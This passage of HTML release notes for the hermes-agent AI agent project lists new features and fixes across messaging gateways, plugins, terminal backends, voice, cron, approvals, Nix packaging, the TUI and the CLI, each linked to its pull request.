<li>Native multi-image sending (<a href="https://github.com/NousResearch/hermes-agent/pull/17909" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17909/hovercard">#17909</a>)</li>
</ul>
<h3>Discord</h3>
<ul>
<li><strong>Opt-in toolsets + ID injection + tool split + Feishu wiring</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326473219" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15457" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15457/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15457">#15457</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326473674" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15458/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15458">#15458</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15610" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15610/hovercard">#15610</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15613/hovercard">#15613</a>)</li>
<li>Fix: coerce <code>limit</code> parameter to int before <code>min()</code> call (<a href="https://github.com/NousResearch/hermes-agent/pull/16319" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16319/hovercard">#16319</a>)</li>
</ul>
<h3>Slack</h3>
<ul>
<li><strong>Register every gateway command as a native slash (Discord/Telegram parity)</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16164/hovercard">#16164</a>)</li>
<li><strong><code>strict_mention</code> config</strong> — prevents thread auto-engagement (<a href="https://github.com/NousResearch/hermes-agent/pull/16193" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16193/hovercard">#16193</a>)</li>
<li><strong><code>channel_skill_bindings</code></strong> — bind specific skills to specific Slack channels (<a href="https://github.com/NousResearch/hermes-agent/pull/16283" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16283/hovercard">#16283</a>)</li>
</ul>
<h3>Signal</h3>
<ul>
<li><strong>Native formatting</strong> — markdown → bodyRanges, reply quotes, reactions (<a href="https://github.com/NousResearch/hermes-agent/pull/17417" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17417/hovercard">#17417</a>)</li>
<li>Native multi-image sending (<a href="https://github.com/NousResearch/hermes-agent/pull/17909" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17909/hovercard">#17909</a>)</li>
</ul>
<h3>Feishu / Mattermost / Email / Signal</h3>
<ul>
<li>All participate in <strong>native multi-image sending</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17909" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17909/hovercard">#17909</a>)</li>
</ul>
<h3>Gateway Core</h3>
<ul>
<li><strong>Centralized audio routing + FLAC support + Telegram doc fallback</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17833" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17833/hovercard">#17833</a>)</li>
<li><strong>Native multi-image sending</strong> across Telegram, Discord, Slack, Mattermost, Email, Signal (<a href="https://github.com/NousResearch/hermes-agent/pull/17909" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17909/hovercard">#17909</a>)</li>
<li><strong>Make hygiene hard message limit configurable</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17000" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17000/hovercard">#17000</a>)</li>
<li><strong>Opt-in runtime-metadata footer on final replies</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17026" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17026/hovercard">#17026</a>)</li>
<li><strong><code>pre_gateway_dispatch</code> hook</strong> — plugins can intercept before dispatch (<a href="https://github.com/NousResearch/hermes-agent/pull/15050" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15050/hovercard">#15050</a>)</li>
<li><strong><code>pre_approval_request</code> / <code>post_approval_response</code> hooks</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16776" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16776/hovercard">#16776</a>)</li>
<li>Fix: timeouts — guard <code>load_config()</code> call against runtime exceptions (<a href="https://github.com/NousResearch/hermes-agent/pull/16318" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16318/hovercard">#16318</a>)</li>
<li>Fix: support passing handler tools via registry (<a href="https://github.com/NousResearch/hermes-agent/pull/15613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15613/hovercard">#15613</a>)</li>
</ul>
<hr>
<h2>🔧 Tool System</h2>
<h3>Plugin-first architecture</h3>
<ul>
<li><strong>Pluggable gateway platforms</strong> — platforms can ship as plugins (<a href="https://github.com/NousResearch/hermes-agent/pull/17751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17751/hovercard">#17751</a>)</li>
<li><strong>Microsoft Teams as first plugin-shipped platform</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17828/hovercard">#17828</a>)</li>
<li><strong><code>pre_gateway_dispatch</code> hook</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15050" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15050/hovercard">#15050</a>)</li>
<li><strong><code>pre_approval_request</code> + <code>post_approval_response</code> hooks</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16776" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16776/hovercard">#16776</a>)</li>
<li><strong><code>duration_ms</code> on <code>post_tool_call</code></strong> (inspired by Claude Code 2.1.119) (<a href="https://github.com/NousResearch/hermes-agent/pull/15429" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15429/hovercard">#15429</a>)</li>
<li><strong>Bundled plugins</strong>: Spotify (<a href="https://github.com/NousResearch/hermes-agent/pull/15174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15174/hovercard">#15174</a>), Google Meet (<a href="https://github.com/NousResearch/hermes-agent/pull/16364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16364/hovercard">#16364</a>), Langfuse observability (<a href="https://github.com/NousResearch/hermes-agent/pull/16917" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16917/hovercard">#16917</a>), hermes-achievements (<a href="https://github.com/NousResearch/hermes-agent/pull/17754" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17754/hovercard">#17754</a>)</li>
<li><strong>Page-scoped plugin slots for built-in dashboard pages</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15658" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15658/hovercard">#15658</a>)</li>
<li><strong>Declarative plugin installation for NixOS module</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15953/hovercard">#15953</a>)</li>
</ul>
<h3>Browser</h3>
<ul>
<li><strong>CDP supervisor</strong> — dialog detection + response + cross-origin iframe eval (<a href="https://github.com/NousResearch/hermes-agent/pull/14540" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14540/hovercard">#14540</a>)</li>
<li><strong>Auto-spawn local Chromium for LAN/localhost URLs</strong> when cloud provider is configured (<a href="https://github.com/NousResearch/hermes-agent/pull/16136" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16136/hovercard">#16136</a>)</li>
</ul>
<h3>Execute code / Terminal</h3>
<ul>
<li><strong>Vercel Sandbox backend</strong> for <code>execute_code</code> / terminal (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17445" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17445/hovercard">#17445</a>)</li>
<li><strong>Collapse subagent <code>task_id</code>s to shared container</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16177" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16177/hovercard">#16177</a>)</li>
<li><strong>Docker: run container as host user</strong> to avoid root-owned bind mounts (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17305" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17305/hovercard">#17305</a>)</li>
<li>Fix: safely quote <code>~/</code> subpaths in wrapped <code>cd</code> commands (<a href="https://github.com/NousResearch/hermes-agent/pull/15394" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15394/hovercard">#15394</a>)</li>
<li>Fix: close file descriptor in <code>LocalEnvironment._update_cwd</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/17300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17300/hovercard">#17300</a>)</li>
<li>Fix: SSH — prevent tar from overwriting remote home dir permissions (<a href="https://github.com/NousResearch/hermes-agent/pull/17898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17898/hovercard">#17898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17867" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17867/hovercard">#17867</a>)</li>
</ul>
<h3>Image generation</h3>
<ul>
<li>See Provider section for updates; no new image providers this window.</li>
</ul>
<h3>TTS / Voice</h3>
<ul>
<li><strong>Pluggable TTS provider registry</strong> under <code>tts.providers.&lt;name&gt;</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/17843" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17843/hovercard">#17843</a>)</li>
<li><strong>Piper</strong> as native local TTS provider (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248924949" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/8508" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/8508/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/8508">#8508</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17885" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17885/hovercard">#17885</a>)</li>
<li><strong>Voice mode CLI parity in the TUI</strong> — VAD loop + TTS + crash forensics (<a href="https://github.com/NousResearch/hermes-agent/pull/14810" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14810/hovercard">#14810</a>)</li>
<li>Fix: vision — use HERMES_HOME-based cache dir instead of cwd (<a href="https://github.com/NousResearch/hermes-agent/pull/17719" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17719/hovercard">#17719</a>)</li>
</ul>
<h3>Cron</h3>
<ul>
<li><strong>Honor <code>hermes tools</code> config for the cron platform</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/14798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14798/hovercard">#14798</a>)</li>
<li><strong>Per-job <code>workdir</code></strong> — project-aware cron runs (<a href="https://github.com/NousResearch/hermes-agent/pull/15110" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15110/hovercard">#15110</a>)</li>
<li><strong><code>context_from</code> field</strong> — chain cron job outputs (<a href="https://github.com/NousResearch/hermes-agent/pull/15606" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15606/hovercard">#15606</a>)</li>
<li>Fix: promote <code>croniter</code> to a core dependency (<a href="https://github.com/NousResearch/hermes-agent/pull/17577" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17577/hovercard">#17577</a>)</li>
</ul>
<h3>Web search</h3>
<ul>
<li><strong>Expose <code>limit</code> for <code>web_search</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16934" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16934/hovercard">#16934</a>)</li>
</ul>
<h3>Maps</h3>
<ul>
<li>Fix: include seconds in timezone UTC offset output (<a href="https://github.com/NousResearch/hermes-agent/pull/16300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16300/hovercard">#16300</a>)</li>
</ul>
<h3>Approvals</h3>
<ul>
<li><strong>Hardline blocklist for unrecoverable commands</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15878" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15878/hovercard">#15878</a>)</li>
<li>Perf: precompile DANGEROUS_PATTERNS and HARDLINE_PATTERNS (<a href="https://github.com/NousResearch/hermes-agent/pull/17206" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17206/hovercard">#17206</a>)</li>
</ul>
<h3>ACP</h3>
<ul>
<li><strong>Advertise and forward image prompts</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/18030" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18030/hovercard">#18030</a>)</li>
</ul>
<h3>API Server</h3>
<ul>
<li><strong>POST <code>/v1/runs/{run_id}/stop</code></strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328254216" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15656" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15656/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15656">#15656</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15842/hovercard">#15842</a>)</li>
<li><strong>Expose run status for external UIs</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344635913" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17085" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17085/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17085">#17085</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17458/hovercard">#17458</a>)</li>
</ul>
<h3>Nix</h3>
<ul>
<li><strong>Declarative plugin installation for NixOS module</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15953/hovercard">#15953</a>)</li>
<li>Fix: use <code>--rebuild</code> in fix-lockfiles to bypass cached FOD store paths (<a href="https://github.com/NousResearch/hermes-agent/pull/15444" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15444/hovercard">#15444</a>)</li>
<li>Fix: <code>extraPackages</code> now actually works via per-user profile (<a href="https://github.com/NousResearch/hermes-agent/pull/17047" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17047/hovercard">#17047</a>)</li>
<li>Fix: refresh web/ npm-deps hash to unblock main builds (<a href="https://github.com/NousResearch/hermes-agent/pull/17174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17174/hovercard">#17174</a>)</li>
<li>Fix: replace magic-nix-cache with Cachix (<a href="https://github.com/NousResearch/hermes-agent/pull/17928" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17928/hovercard">#17928</a>)</li>
</ul>
<hr>
<h2>🖥️ TUI</h2>
<h3>New features</h3>
<ul>
<li><strong>LaTeX rendering</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17175" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17175/hovercard">#17175</a>)</li>
<li><strong><code>/reload</code> .env hot-reload</strong> — ported from the classic CLI (<a href="https://github.com/NousResearch/hermes-agent/pull/17286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17286/hovercard">#17286</a>)</li>
<li><strong>Pluggable busy-indicator styles</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304012946" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/13610" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/13610/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/13610">#13610</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17150" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17150/hovercard">#17150</a>)</li>
<li><strong>Opt-in auto-resume of the most recent session</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17130/hovercard">#17130</a>)</li>
<li><strong>Expanded light-terminal auto-detection</strong> — <code>HERMES_TUI_THEME</code> + background hex (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17113" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17113/hovercard">#17113</a>)</li>
<li><strong>Delete sessions from <code>/resume</code> picker with <code>d</code></strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17668" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17668/hovercard">#17668</a>)</li>
<li><strong>Line-by-line scroll on modified mouse wheel</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17669" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17669/hovercard">#17669</a>)</li>
<li><strong>Delete queued message while editing with ctrl-x / cancel with esc</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16707" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16707/hovercard">#16707</a>)</li>
<li><strong>Per-section visibility for the details accordion</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/14968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14968/hovercard">#14968</a>)</li>
<li><strong>Voice mode CLI parity</strong> — VAD loop + TTS + crash forensics (<a href="https://github.com/NousResearch/hermes-agent/pull/14810" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14810/hovercard">#14810</a>)</li>
<li><strong>Contextual first-touch hints ported to TUI</strong> — <code>/busy</code>, <code>/verbose</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/16054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16054/hovercard">#16054</a>)</li>
<li><strong>Mini help menu on <code>?</code> in the input field</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/18043" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18043/hovercard">#18043</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Fix: proactive mouse disable on ConPTY + <code>/mouse</code> toggle command (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevin-ho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevin-ho">@kevin-ho</a>, WSL2 ghost-mouse fix) (<a href="https://github.com/NousResearch/hermes-agent/pull/15488" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15488/hovercard">#15488</a>)</li>
<li>Fix: restore skills search RPC (<a href="https://github.com/NousResearch/hermes-agent/pull/15870" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15870/hovercard">#15870</a>)</li>
<li>Perf: cache text measurements across yoga flex re-passes (<a href="https://github.com/NousResearch/hermes-agent/pull/14818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14818/hovercard">#14818</a>)</li>
<li>Perf: stabilize long-session scrolling (<a href="https://github.com/NousResearch/hermes-agent/pull/15926" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15926/hovercard">#15926</a>)</li>
<li>Perf: lazily seed virtual history heights (<a href="https://github.com/NousResearch/hermes-agent/pull/16523" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16523/hovercard">#16523</a>)</li>
<li>Perf: cut visible cold start ~57% with lazy agent init (<a href="https://github.com/NousResearch/hermes-agent/pull/17190" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17190/hovercard">#17190</a>)</li>
</ul>
<hr>
<h2>🖱️ CLI &amp; User Experience</h2>
<h3>New commands</h3>
<ul>
<li><strong><code>hermes -z &lt;prompt&gt;</code></strong> — non-interactive one-shot mode (<a href="https://github.com/NousResearch/hermes-agent/pull/15702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15702/hovercard">#15702</a>)</li>
<li><strong><code>hermes -z</code> with <code>--model</code> / <code>--provider</code> / <code>HERMES_INFERENCE_MODEL</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15704" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15704/hovercard">#15704</a>)</li>
<li><strong><code>hermes update --check</code></strong> preflight flag (<a href="https://github.com/NousResearch/hermes-agent/pull/15841" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15841/hovercard">#15841</a>)</li>
<li><strong><code>hermes fallback</code></strong> command for managing fallback providers (<a href="https://github.com/NousResearch/hermes-agent/pull/16052" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16052/hovercard">#16052</a>)</li>
<li><strong><code>/busy</code></strong> slash command for busy input mode (<a href="https://github.com/NousResearch/hermes-agent/pull/15382" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15382/hovercard">#15382</a>)</li>
<li><strong><code>/busy</code> input mode 'steer'</strong> as a third option (<a href="https://github.com/NousResearch/hermes-agent/pull/16279" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16279/hovercard">#16279</a>)</li>
<li><strong><code>/btw</code> as alias for <code>/background</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16053" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16053/hovercard">#16053</a>)</li>
<li><strong><code>/reload-skills</code></strong> slash command (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354439298" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17670" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17670/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17670">#17670</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17744" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17744/hovercard">#17744</a>)</li>
<li><strong>Surface <code>/queue</code>, <code>/bg</code>, <code>/steer</code> in agent-running placeholder</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16118" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16118/hovercard">#16118</a>)</li>
</ul>
<h3>Setup / onboarding</h3>
<ul>
<li><strong>Auto-reconfigure on existing installs</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15879" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15879/hovercard">#15879</a>)</li>
<li><strong>Contextual first-touch hints for <code>/busy</code> and <code>/verbose</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16046/hovercard">#16046</a>)</li>
<li><strong>Cost-saving tips from the April 30 tip-of-the-day</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17841" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17841/hovercard">#17841</a>)</li>
<li><strong>Hyperlink startup banner title to the latest GitHub Release</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/14945" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14945/hovercard">#14945</a>)</li>
</ul>
<h3>Update / backup</h3>
<ul>
<li><strong>Snapshot pairing data before <code>git pull</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16383" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16383/hovercard">#16383</a>)</li>
<li><strong>Auto-backup HERMES_HOME before <code>hermes update</code></strong> (opt-in, off by default) (<a href="https://github.com/NousResearch/hermes-agent/pull/16539" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16539/hovercard">#16539</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16566" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16566/hovercard">#16566</a>)</li>
<li><strong>Exclude <code>checkpoints/</code> from backups</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16572/hovercard">#16572</a>)</li>
<li><strong>Exclude SQLite WAL/SHM/journal sidecars from backups</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16576" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16576/hovercard">#16576</a>)</li>
<li><strong>Installer FHS layout for root installs on Linux</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15608" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15608/hovercard">#15608</a>)</li>
<li>Fix: kill stale dashboards instead of warning (<a href="https://github.com/NousResearch/hermes-agent/pull/17832" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17832/hovercard">#17832</a>)</li>
<li>Fix: show correct update status on nix-built hermes (<a href="https://github.com/NousResearch/hermes-agent/pull/17550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17550/hovercard">#17550</a>)</li>
</ul>
<h3>Slash-command housekeeping</h3>
<ul>
<li>Refactor: drop <code>/provider</code>, <code>/plan</code> handler, and clean up slash registry (<a href="https://github.com/NousResearch/hermes-agent/pull/15047" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15047/hovercard">#15047</a>)</li>
<li>Refactor: drop <code>persist_session</code> plumbing + fix broken <code>/btw</code> mid-turn bypass (<a href="https://github.com/NousResearch/hermes-agent/pull/16075" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16075/hovercard">#16075</a>)</li>
</ul>
